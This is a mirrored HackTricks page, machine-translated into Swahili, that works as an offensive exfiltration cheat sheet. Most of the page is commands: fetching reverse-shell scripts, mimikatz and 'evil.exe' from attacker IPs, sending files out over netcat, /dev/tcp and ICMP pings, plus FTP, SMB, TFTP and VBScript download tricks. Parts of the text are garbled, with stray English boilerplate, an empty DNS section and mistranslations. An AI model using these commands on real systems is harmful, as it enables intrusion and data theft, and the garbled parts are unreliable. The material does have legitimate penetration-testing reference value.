Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/exfiltration.md

14 KiB
Raw Blame History

Kufyonza

Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Kikundi cha Usalama cha Kujitahidi Kwa Bidii

{% embed url="https://discord.gg/tryhardsecurity" %}

Vyanzo vya kawaida vilivyoorodheshwa kwa ajili ya kufyonza taarifa

Angalia https://lots-project.com/ kupata vyanzo vya kawaida vilivyoorodheshwa ambavyo vinaweza kutumiwa vibaya

Nakili&Banda la Msingi wa 64

Linux

base64 -w0 <file> #Encode file
base64 -d file #Decode file

Windows

certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll

HTTP

Linux

wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD

Windows

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf

#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous

Pakia faili

# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world

# Send a file
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world

Seva ya HTTPS

# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:443

### PYTHON 2
import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
###

### PYTHON3
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()
###

### USING FLASK
from flask import Flask, redirect, request
from urllib.parse import quote
app = Flask(__name__)
@app.route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
###

FTP

Seva ya FTP (python)

pip3 install pyftpdlib
python3 -m pyftpdlib -p 21

Seva ya FTP (NodeJS)

sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp

Seva ya FTP (pure-ftp)

apt-get update && apt-get install pure-ftp

#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

Mteja wa Windows

#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt

SMB

Kali kama server

kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`

Au tengeneza sehemu ya smb kwa kutumia samba:

apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart

Exfiltration Techniques on Windows

Clipboard

The clipboard can be used to exfiltrate data by copying sensitive information and pasting it into a file or application on the attacker's system.

File Transfer Protocols

File transfer protocols such as FTP, SFTP, and SMB can be used to transfer files containing sensitive data from the compromised system to the attacker's system.

Email

Email can be used to exfiltrate data by sending emails with attachments containing sensitive information to an email account controlled by the attacker.

DNS Tunneling

DNS tunneling can be used to exfiltrate data by encoding sensitive information in DNS queries and responses.

Web Protocols

Web protocols such as HTTP and HTTPS can be used to exfiltrate data by sending HTTP requests containing sensitive information to a web server controlled by the attacker.

CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials

WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:

SCP

Mshambuliaji lazima awe na SSHd inayofanya kazi.

scp <username>@<Attacker_IP>:<directory>/<filename>

SSHFS

Ikiwa muathiriwa ana SSH, mkaidi anaweza kufunga saraka kutoka kwa muathiriwa kwenda kwa mkaidi.

sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/

NC

Data Exfiltration

Data exfiltration is the unauthorized transfer of data from a computer or server. Attackers use various techniques to exfiltrate data, such as:

  • Email: Sending sensitive data as email attachments.
  • FTP: Transferring data using File Transfer Protocol (FTP).
  • DNS: Sending data through DNS requests.
  • HTTP/HTTPS: Using HTTP or HTTPS protocols to send data.
  • Steganography: Hiding data within other files to avoid detection.
  • Encryption: Encrypting data before exfiltration to avoid detection.

To prevent data exfiltration, organizations can implement measures such as:

  • Network Segmentation: Dividing the network into segments to limit unauthorized access.
  • Data Loss Prevention (DLP): Implementing DLP solutions to monitor and control data transfers.
  • Access Controls: Restricting access to sensitive data based on user roles.
  • Monitoring and Logging: Monitoring network traffic and logging events for analysis.
  • Encryption: Encrypting data at rest and in transit to protect it from unauthorized access.

By understanding common exfiltration techniques and implementing appropriate security measures, organizations can better protect their data from unauthorized access and leakage.

nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file

/dev/tcp

Pakua faili kutoka kwa muathiriwa

nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim

Pakia faili kwa muathiriwa

nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/10.10.10.10/4444
cat <&6 > file.txt

Asante kwa @BinaryShadow_

ICMP

# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will 4bytes per ping packet (you could probably increase this until 16)

from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)

SMTP

Ikiwa unaweza kutuma data kwa seva ya SMTP, unaweza kuunda SMTP ya kupokea data kwa kutumia python:

sudo python -m smtpd -n -c DebuggingServer :25

TFTP

Kwa chaguo-msingi katika XP na 2003 (katika nyingine inahitaji kuongezwa wazi wakati wa usakinishaji)

Katika Kali, anzisha seva ya TFTP:

#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp

Server ya TFTP kwa python:

pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>

Katika mwendazake, unganisha kwenye seva ya Kali:

tftp -i <KALI-IP> get nc.exe

PHP

Pakua faili kwa PHP oneliner:

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php

VBScript

VBScript ni lugha ya programu inayotumika sana kwa maendeleo ya skripti za Windows. Inaweza kutumika kwa ufanisi kwa madhumuni ya uhamishaji wa data kwa sababu ya uwezo wake wa kufanya kazi na faili za nje na mitandao.

Attacker> python -m SimpleHTTPServer 80

Mnajisi

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.5/evil.exe evil.exe

Debug.exe

Programu ya debug.exe sio tu inaruhusu ukaguzi wa binaries lakini pia ina uwezo wa kujenga upya kutoka hex. Hii inamaanisha kwamba kwa kutoa hex ya binary, debug.exe inaweza kuzalisha faili ya binary. Hata hivyo, ni muhimu kutambua kwamba debug.exe ina kizuizi cha kuunda faili hadi 64 kb in size.

# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt

Kisha nakili na ushirikishe maudhui kwenye windows-shell na faili inayoitwa nc.exe itaundwa.

DNS

Kikundi cha Usalama cha Kujaribu Kwa Bidii

{% embed url="https://discord.gg/tryhardsecurity" %}

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: